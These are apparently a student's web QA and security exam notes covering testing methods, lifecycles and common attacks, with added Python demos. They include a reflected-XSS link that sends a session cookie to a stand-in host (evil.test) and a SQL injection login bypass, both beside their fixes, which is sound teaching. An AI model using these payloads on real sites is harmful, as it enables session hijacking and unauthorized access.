Created April 19, 2013 03:11 (gist stevebosworth/5417845)
#SPECS, STANDARDS, POLICIES
##specifications
- vague, wrong or missing specifications are a major cause of bugs
- established by the customer/owner of the website
##standards
- set of guidelines to follow, usually set by a body of professionals (W3C, ISO)
##policies
- developed by an organization to standardize its own products/materials
- could be set by you, your organization or the client
#TESTING
##Dynamic Testing
- running the site and exercising its basic functions
- basic usability
##Static Testing
- examining the code, pages and documents without running them (reviews, walkthroughs, linters)
##Black Box
- tester only sees the inputs and outputs; has no access to the code or to what happens behind the scenes
##White Box
- tester has access to the code and traces how a given output is produced
- code reviews or pair programming can be ways to white box test
#WAYS TO TEST
##Test to Pass
- tests ensure that minimal functionality is achieved; does not push the software to its limits
- e.g. a character missing from an input, or a badly formed input, to check validation
##Test to Fail
- breaks it
- attempt anything and everything to see if it breaks (invalid, oversized and hostile inputs)
- good for public-facing pages, which receive exactly that kind of input
- costly
#SECURITY ISSUES
- many early security measures were reactions to worms (the 1988 Morris worm led to the creation of the first CERT)
##revealing error messages
- turn off all debugging features and verbose error output in production; log the details server-side and show users a generic message (stack traces, file paths and SQL errors tell an attacker how the site is built)
- close off network connections, ports and services that are not needed
##ddos
- distributed denial of service attack
- uses a botnet to flood a site or server with requests, causing it to slow down or crash
##xss (XSS, CSRF, XSSI)
###XSS
- Cross Site Scripting
- insertion of script into a page (usually JavaScript) to perform an operation the site did not intend
- usually done through a URL parameter or a form field whose value the site echoes back into its HTML
- untrusted input must be HTML-escaped (at least <, >, &, " and ') wherever it is written into a page, and validated before it is used; input must never be executed as code
- problems that can arise from this: embedding content, embedding malicious code, stealing user sessions and impersonating users or servers
- the same origin policy (sometimes called the cross-domain security policy) is what normally keeps one site's script away from another site's data; XSS defeats it because the injected script runs as part of the victim site
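As an added example (not part of the original notes): a reflected XSS through a URL parameter, beside the fix of HTML-escaping the value before it is written into the page. The search page template, the `example.test` / `evil.test` hosts and the attack link are constructed for illustration.

```python
# Added example (not from the original notes): reflected XSS through a URL
# parameter, and the fix of HTML-escaping the value before it is written into
# the page. The search page and attack URL are constructed for illustration.
import html
from urllib.parse import parse_qs, urlsplit

# hypothetical page template that echoes the search term back to the user
PAGE = "<h1>Search results</h1><p>You searched for: {query}</p>"


def query_param(url: str) -> str:
    """Return the raw 'q' query-string parameter (already percent-decoded)."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(url: str) -> str:
    """Writes the raw parameter into the HTML: whatever the attacker put in
    the link is now markup (and script) in the victim's page."""
    return PAGE.format(query=query_param(url))


def render_escaped(url: str) -> str:
    """Escapes < > & " ' so the browser renders the parameter as text.
    html.escape is right for HTML body and attribute values; JavaScript or
    URL contexts need their own encoding."""
    return PAGE.format(query=html.escape(query_param(url), quote=True))


# constructed attack link: the script ships the session cookie to the attacker
ATTACK = ("https://example.test/search?q=<script>document.location="
          "'https://evil.test/?c='%2Bdocument.cookie</script>")

if __name__ == "__main__":
    print(render_vulnerable(ATTACK))  # <script>...</script> appears verbatim
    print(render_escaped(ATTACK))     # &lt;script&gt;...&lt;/script&gt;
```

The escaping has to happen at output time, for the context the value lands in; stripping characters on input is not enough because the same value may be written into HTML, an attribute, a script block or a URL, each with different dangerous characters.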
###CSRF (Cross Site Request Forgery)
- forging a form submission to a site the user is logged into: the attacker's page submits the form and the browser attaches the user's session cookie automatically, so the request looks legitimate to the server
- a concern for web applications that keep server state or execute server-side transactions (anything a POST changes)
- defended against with a secret token that the server puts into each form and checks on submission; the attacker's page cannot read it
###XSSI (Cross Site Script Inclusion)
- including a script from another domain to enable information sharing
- usually when using an API or trusting a script from another server
- a script included from another origin runs with full access to the including page, and the reverse is also a risk: if a site serves user-specific data as a script (e.g. JSON wrapped in a callback), any other site can include it with a script tag and read that data
##sql injection
- untrusted input concatenated into an SQL query changes the structure of the query rather than just its data (e.g. a password of ' OR '1'='1 makes a login check true for every row)
- prevented by parameterized queries / prepared statements, which send the data separately from the SQL text
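As an added example (not part of the original notes): a login query built by string concatenation beside the parameterized version, run against an in-memory SQLite table. The table and its two users are constructed for the example.

```python
# Added example (not from the original notes): a login query built by string
# concatenation next to the parameterized version, run against an in-memory
# SQLite table with two constructed users.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])  # constructed rows
    return conn


def login_vulnerable(conn, user: str, password: str) -> list:
    """User input is pasted into the SQL text, so a quote in the input ends the
    string literal and the rest of the input becomes part of the query."""
    sql = f"SELECT name FROM users WHERE name = '{user}' AND password = '{password}'"
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, user: str, password: str) -> list:
    """Placeholders: the driver sends the values separately from the SQL text,
    so a quote in the password is just a character to compare against."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (user, password))]


# classic payload: closes the password literal and appends an always-true clause
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "nobody", PAYLOAD))     # every user
    print(login_parameterized(conn, "nobody", PAYLOAD))  # []
```

With the payload, the concatenated query becomes `... WHERE name = 'nobody' AND password = '' OR '1'='1'`, and since AND binds tighter than OR every row matches. In PHP the equivalent of the parameterized version is `PDO::prepare()` with bound parameters.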
##phishing
- tricking users into handing over credentials or card details to a fake site that mimics a legitimate one, usually reached through a link in an e-mail
#TYPES OF MALWARE
##Rootkits
- software which hides an attacker's presence (processes, files, connections) and keeps privileged (root) access for them
##Adware
- software which displays unwanted ads
##Botnets
- distributed collection of compromised computers controlled by an individual or group
##Spyware
- software which collects user information and sends it home
##Clickbots
- software which sits dormant on your computer until it is instructed by the owner to visit sites and perform 'clicks' (on ads and the like)
##Trojan Horses
- software which claims to do one thing but also installs other software (like a keylogger or spyware) without the user's knowledge
##Keyloggers
- software installed on a computer, in a program, or on a website that covertly records user keystrokes in an attempt to collect personal information
#ENCRYPTION
#4 MAIN REASONS WE BUILD A TEST PLAN
##proof of testing
- gives you something to show clients and coworkers as proof that something did or didn't work
##organization
- adds structure to requirements and creates goals for tests and developers
- adds specific requirements for a feature or project to be considered successful
##tracking
- who is responsible for what?
- what works, what doesn't, and when it did or didn't work
##repeatability
- allows you to confidently produce code that works now and in the future
- if something breaks you can backtrack through passes and fails to find the likely cause (tied to tracking)
#WHAT IS A TEST PLAN
- used for communicating the purpose and goal of tests
- documents the tests themselves
##what is recorded
- what was tested
- i.e. product, feature or specific code that was tested
- resources required for the test
- test environment (software, hardware, browsers)
- when they were tested
- keep track of what version of code was tested as tests are repeated and pass or fail
- who confirmed the results of the test
- what the results were
#HOW TO BUILD SECURE SYSTEMS
- Prevent
- Detect
- Contain
- Recover
#CAPABILITY MATURITY MODEL
- provides a measure of the maturity of a company's software development process
- how rigid or defined are your processes for testing and requirements?
- 5 stages to CMM:
1. Initial - ad hoc processes (mom and pop shops)
2. Repeatable
3. Defined
4. Managed
5. Optimizing - largest companies (Google, NASA, IBM)
#ISO 9000
- deals with quality management and quality assurance
- possible case study question
#Main Hacking methods
- know them
- 5 out of 9
1. XSS
2. SQL Injection
3. Phishing
4. Pharming
5.
#Development Lifecycles
- agile, scrum, waterfall, extreme programming
- know the difference between agile and scrum or extreme programming
##WATERFALL
- traditional model for project management
- common for construction projects, going to the moon, building things
- first you plan, then you execute, then you have the final product
- not very flexible
- once requirements are set they are not expected to change, and changing them late is very expensive
- failures and problems accumulate through the process and lead to spectacular failures (your bridge falls apart)
- terrible for software, whose requirements keep changing
##AGILE
- embraces an iterative process for constantly evolving products (software is never really 'done')
- you plan, design, execute, then start over in small steps to achieve a larger goal
- is really more of a philosophy or general approach to iterative software design than a set of rules or guidelines
###The Agile Manifesto reads, in its entirety, as follows:
- We are uncovering better ways of developing software by doing it and helping others do it. Through this work we have come to value:
- Individuals and interactions over processes and tools
- Working software over comprehensive documentation
- Customer collaboration over contract negotiation
- Responding to change over following a plan
- That is, while there is value in the items on the right, we value the items on the left more.
##SCRUM
- more practical approach to project management
- is a type of agile; could be considered an implementation of Agile
- more rigid set of rules (i.e. 15 minute standup meetings at the start of each day, 'sprints' that create a series of strictly time-boxed micro development cycles, who is responsible for what in a 'sprint')
- has defined roles for management, developers and clients in the system
##EXTREME PROGRAMMING
- like scrum, is an implementation of agile
- emphasizes the role of the client in the process of development and includes them in all stages
- decentralized - clients, managers, developers are equal partners in development
- promotes unit testing, code review, pair programming, and constant role switching to maintain quality and its decentralized nature
#LEGAL STUFF
- 5 ways to protect yourself legally
##Due Diligence
#THINGS TO THINK ABOUT
##know the roles in the overall scheme of development
- developers
- owners
- users
##What hackers know
- more than computers
- social engineering
- break and enter
##Minimum Security requirements
- encryption
- logins and passwords
- perform QA
- having security features does not make for QA
##Project Planning
- theoretical stuff
-
#SOFTWARE TESTING DOES NOT GUARANTEE QUALITY
- just that it runs
#configuration testing, usability testing (User Acceptance Testing) Why Best? Why Hard?
#Version Control
- first 3 slides
- lifecycle of version control
Designing Tests
-
SECURITY
Firewalls
-
!php "encryption" (these are hashes, not encryption)!
$var = md5(...);   // md5() is a one-way hash, not encryption: it cannot be decrypted, only compared
$pass = md5(...);  // plain MD5 is not suitable for passwords (fast, unsalted, equal passwords give equal hashes); use password_hash() / password_verify() (PHP 5.5+) instead
OR
$var = tri-des(...);  // there is no tri-des() function in PHP; 3DES was only available through the old mcrypt extension (removed in PHP 7.2) and should not be used in new code
!.net encryption!
using microsoft.security   // not a real namespace; .NET hashing and encryption live in System.Security.Cryptography
encryptMD5()               // not a real method; System.Security.Cryptography.MD5 exists, but it is a hash, not encryption
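As an added example (not part of the original notes): why `md5($pass)` is not a safe way to store passwords, beside a salted, slow hash to use instead. PBKDF2 from Python's `hashlib` stands in for PHP's `password_hash()`; the `algorithm$iterations$salt$hash` record format is my own, not a library's.

```python
# Added example (not from the original notes): why md5($password) is not a
# safe way to store passwords, and a salted, slow hash to use instead. PBKDF2
# from hashlib stands in for PHP's password_hash(); the record format is my own.
import hashlib
import hmac
import os


def md5_password(password: str) -> str:
    """What the notes' md5($pass) does: fast and unsalted, so two users with the
    same password get the same digest and precomputed tables crack it at once."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: bytes = b"", iterations: int = 600_000) -> str:
    """Salted PBKDF2-HMAC-SHA256. The random salt makes equal passwords hash
    differently; the iteration count makes each guess expensive."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # self-describing record (hypothetical format): algorithm$iterations$salt$hash
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    except ValueError:  # malformed record
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(md5_password("hunter2") == md5_password("hunter2"))  # True: no salt
    a, b = hash_password("hunter2"), hash_password("hunter2")
    print(a == b, verify_password("hunter2", a), verify_password("hunter3", b))
```

Storing the salt and iteration count next to the hash is what lets the count be raised later without breaking existing records. PHP's `password_hash()` / `password_verify()` (bcrypt by default) do the same job and are the right call from PHP.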
SSL encryption
- see diagram
- will be a question
- the server presents a certificate, the browser verifies it against its trusted CAs, and the two negotiate a session key; gives confidentiality and integrity in transit plus authentication of the server
Definition
explain
case studies
- situation, i.e. company has to do ...
- response
- from a hacker's perspective
how-to
-
explain the steps involved in the CMM
Explain 5 ways a developer can protect themselves legally
What would be the severity and priority in this situation
- user queries returning wrong information
- as a developer what would you look for
How-to
- ssl
- encryption
- implement a development lifecycle
what is a test plan, why do they use it
-